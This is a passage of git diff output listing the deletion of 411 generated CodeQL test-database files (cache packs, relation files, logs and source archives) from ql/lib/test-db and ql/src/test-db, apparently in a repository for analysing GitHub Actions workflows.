688 -> 0 bytes .../db-yaml/default/cache/pages/df.pack | Bin 86 -> 0 bytes .../db-yaml/default/cache/pages/e4.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/e6.pack | Bin 117 -> 0 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/predicates/01.pack | Bin 212 -> 0 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 339 -> 0 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 232 -> 0 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 151 -> 0 bytes .../db-yaml/default/cache/predicates/1f.pack | Bin 210 -> 0 bytes .../db-yaml/default/cache/predicates/20.pack | Bin 220 -> 0 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 537 -> 0 bytes .../db-yaml/default/cache/predicates/25.pack | Bin 214 -> 0 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/28.pack | Bin 423 -> 0 bytes .../db-yaml/default/cache/predicates/2a.pack | Bin 214 -> 0 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 152 -> 0 bytes .../db-yaml/default/cache/predicates/32.pack | Bin 211 -> 0 bytes .../db-yaml/default/cache/predicates/36.pack | Bin 213 -> 0 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 367 -> 0 bytes .../db-yaml/default/cache/predicates/43.pack | Bin 223 -> 0 bytes .../db-yaml/default/cache/predicates/45.pack | Bin 410 -> 0 bytes .../db-yaml/default/cache/predicates/57.pack | Bin 411 -> 0 bytes .../db-yaml/default/cache/predicates/59.pack | Bin 408 -> 0 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 375 -> 0 bytes .../db-yaml/default/cache/predicates/5b.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/5d.pack | Bin 204 -> 0 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 161 -> 0 bytes .../db-yaml/default/cache/predicates/66.pack | Bin 225 -> 0 bytes .../db-yaml/default/cache/predicates/6c.pack | Bin 206 -> 0 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/74.pack | Bin 418 -> 0 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 345 -> 0 bytes .../db-yaml/default/cache/predicates/78.pack | Bin 220 -> 0 bytes .../db-yaml/default/cache/predicates/7b.pack | Bin 210 -> 0 bytes .../db-yaml/default/cache/predicates/7e.pack | Bin 220 -> 0 bytes .../db-yaml/default/cache/predicates/83.pack | Bin 207 -> 0 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 341 -> 0 bytes .../db-yaml/default/cache/predicates/8d.pack | Bin 212 -> 0 bytes .../db-yaml/default/cache/predicates/96.pack | Bin 217 -> 0 bytes .../db-yaml/default/cache/predicates/98.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 336 -> 0 bytes .../db-yaml/default/cache/predicates/9f.pack | Bin 211 -> 0 bytes .../db-yaml/default/cache/predicates/a0.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/a9.pack | Bin 217 -> 0 bytes .../db-yaml/default/cache/predicates/bd.pack | Bin 250 -> 0 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 157 -> 0 bytes .../db-yaml/default/cache/predicates/c9.pack | Bin 219 -> 0 bytes .../db-yaml/default/cache/predicates/ca.pack | Bin 254 -> 0 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 363 -> 0 bytes .../db-yaml/default/cache/predicates/d5.pack | Bin 260 -> 0 bytes .../db-yaml/default/cache/predicates/dc.pack | Bin 212 -> 0 bytes .../db-yaml/default/cache/predicates/de.pack | Bin 209 -> 0 bytes .../db-yaml/default/cache/predicates/df.pack | Bin 217 -> 0 bytes .../db-yaml/default/cache/predicates/e0.pack | Bin 207 -> 0 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/ef.pack | Bin 221 -> 0 bytes .../db-yaml/default/cache/predicates/f8.pack | Bin 215 -> 0 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 154 -> 0 bytes .../db-yaml/default/cache/predicates/ff.pack | Bin 253 -> 0 bytes .../db-yaml/default/cache/relations/07.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/0d.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/0e.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/10.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/14.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/18.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/19.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/1b.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/28.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 177 -> 0 bytes .../db-yaml/default/cache/relations/39.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/47.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/4d.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/52.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/56.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/59.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/5b.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/5d.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/80.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/85.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/8b.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/aa.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 109 -> 0 bytes .../db-yaml/default/cache/relations/c1.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/cc.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/d0.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/d5.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/da.pack | Bin 126 -> 0 bytes ql/src/test-db/db-yaml/default/cache/version | 1 - .../db-yaml/default/containerparent.rel | Bin 128 -> 0 bytes .../default/containerparent.rel.checksum | Bin 12 -> 0 bytes ql/src/test-db/db-yaml/default/files.rel | Bin 56 -> 0 bytes .../db-yaml/default/files.rel.checksum | Bin 12 -> 0 bytes ql/src/test-db/db-yaml/default/folders.rel | Bin 80 -> 0 bytes .../db-yaml/default/folders.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/locations_default.rel | Bin 7992 -> 0 bytes .../default/locations_default.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/pools/0/buckets/info | Bin 40 -> 0 bytes .../default/pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes ql/src/test-db/db-yaml/default/pools/0/info | Bin 33 -> 0 bytes .../db-yaml/default/pools/0/metadata/info | Bin 40 -> 0 bytes .../default/pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../db-yaml/default/pools/1/buckets/info | Bin 40 -> 0 bytes .../default/pools/1/buckets/page-000000 | Bin 8192 -> 0 bytes .../test-db/db-yaml/default/pools/1/ids1/info | Bin 40 -> 0 bytes .../db-yaml/default/pools/1/ids1/page-000000 | Bin 8192 -> 0 bytes .../db-yaml/default/pools/1/indices1/info | Bin 40 -> 0 bytes .../default/pools/1/indices1/page-000000 | Bin 8192 -> 0 bytes ql/src/test-db/db-yaml/default/pools/1/info | Bin 41 -> 0 bytes .../db-yaml/default/pools/1/metadata/info | Bin 40 -> 0 bytes .../default/pools/1/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/1/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/src/test-db/db-yaml/default/pools/poolInfo | Bin 32 -> 0 bytes .../db-yaml/default/sourceLocationPrefix.rel | Bin 4 -> 0 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 12 -> 0 bytes .../default/strings/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/src/test-db/db-yaml/default/yaml.rel | Bin 7992 -> 0 bytes .../test-db/db-yaml/default/yaml.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/yaml_locations.rel | Bin 2664 -> 0 bytes .../default/yaml_locations.rel.checksum | Bin 12 -> 0 bytes .../test-db/db-yaml/default/yaml_scalars.rel | Bin 3048 -> 0 bytes .../db-yaml/default/yaml_scalars.rel.checksum | Bin 12 -> 0 bytes ql/src/test-db/db-yaml/yaml.dbscheme | 80 ----- ...-diagnostics-add-20240203T091753.298Z.json | 0 ...-diagnostics-add-20240203T091754.191Z.json | 0 .../database-create-20240203.101751.644.log | 281 ------------------ ...tabase-index-files-20240203.101752.962.log | 21 -- ql/src/test-db/src.zip | Bin 3816 -> 0 bytes 411 files changed, 776 deletions(-) delete mode 100644 ql/lib/test-db/baseline-info.json delete mode 100644 ql/lib/test-db/codeql-database.yml delete mode 100644 ql/lib/test-db/db-yaml/default/cache/.lock delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#0#e delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#1#eb delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#1#b delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#2# delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode delete mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/01.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/02.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/0d.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/15.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/1f.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/1f.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/29.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/2b.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/2d.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/34.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/34.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/37.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/37.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/43.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/54.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/55.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/55.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/9c.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/9c.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/a1.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b4.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b4.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b7.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b9.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/bc.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/bc.pack.d delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/c0.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/c3.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/e0.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/f3.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/fc.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/02.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/03.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/06.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/09.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/10.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/24.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/26.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/2d.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/2e.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/2f.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/3b.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/3c.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/53.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/5a.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/60.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/6f.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/75.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/7c.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/86.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/99.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/a1.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/a2.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/a8.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/bf.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/c5.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/d2.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/d4.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/e3.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/e4.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/f9.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/06.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/10.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/11.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/19.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/1e.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/2a.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/2f.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/39.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/4b.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/56.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/5c.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/6a.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/7c.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/9f.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/a0.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/ac.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/bf.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/ca.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/d3.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/e9.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/f9.pack delete mode 100644 ql/lib/test-db/db-yaml/default/cache/version delete mode 100644 ql/lib/test-db/db-yaml/default/containerparent.rel delete mode 100644 ql/lib/test-db/db-yaml/default/containerparent.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/files.rel delete mode 100644 ql/lib/test-db/db-yaml/default/files.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/folders.rel delete mode 100644 ql/lib/test-db/db-yaml/default/folders.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/locations_default.rel delete mode 100644 ql/lib/test-db/db-yaml/default/locations_default.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/buckets/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/buckets/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/metadata/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/metadata/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/0/pageDump/page-000000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/buckets/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/buckets/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/ids1/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/ids1/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/indices1/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/indices1/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/metadata/info delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/metadata/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/1/pageDump/page-000000000 delete mode 100644 ql/lib/test-db/db-yaml/default/pools/poolInfo delete mode 100644 ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel delete mode 100644 ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/strings/0/buckets/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/strings/0/metadata/page-000000 delete mode 100644 ql/lib/test-db/db-yaml/default/strings/0/pageDump/page-000000000 delete mode 100644 ql/lib/test-db/db-yaml/default/yaml.rel delete mode 100644 ql/lib/test-db/db-yaml/default/yaml.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/yaml_locations.rel delete mode 100644 ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum delete mode 100644 ql/lib/test-db/db-yaml/default/yaml_scalars.rel delete mode 100644 ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum delete mode 100755 ql/lib/test-db/db-yaml/yaml.dbscheme delete mode 100644 ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json delete mode 100644 ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json delete mode 100644 ql/lib/test-db/log/database-create-20240203.101754.571.log delete mode 100644 ql/lib/test-db/log/database-index-files-20240203.101755.239.log delete mode 100644 ql/lib/test-db/src.zip delete mode 100644 ql/src/test-db/baseline-info.json delete mode 100644 ql/src/test-db/codeql-database.yml delete mode 100644 ql/src/test-db/db-yaml/default/cache/.lock delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#0#e delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#1#eb delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#1#b delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#2# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-15fd6561 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-15fd6561#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-729b2108 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-729b2108#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-7595a81e delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-7595a81e#0#tttttt delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-7595a81e#1#tt delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-cd159b4d delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-cd159b4d#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d2947120 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d2947120#0#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d8fdd114 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d8fdd114#0# delete mode 100644 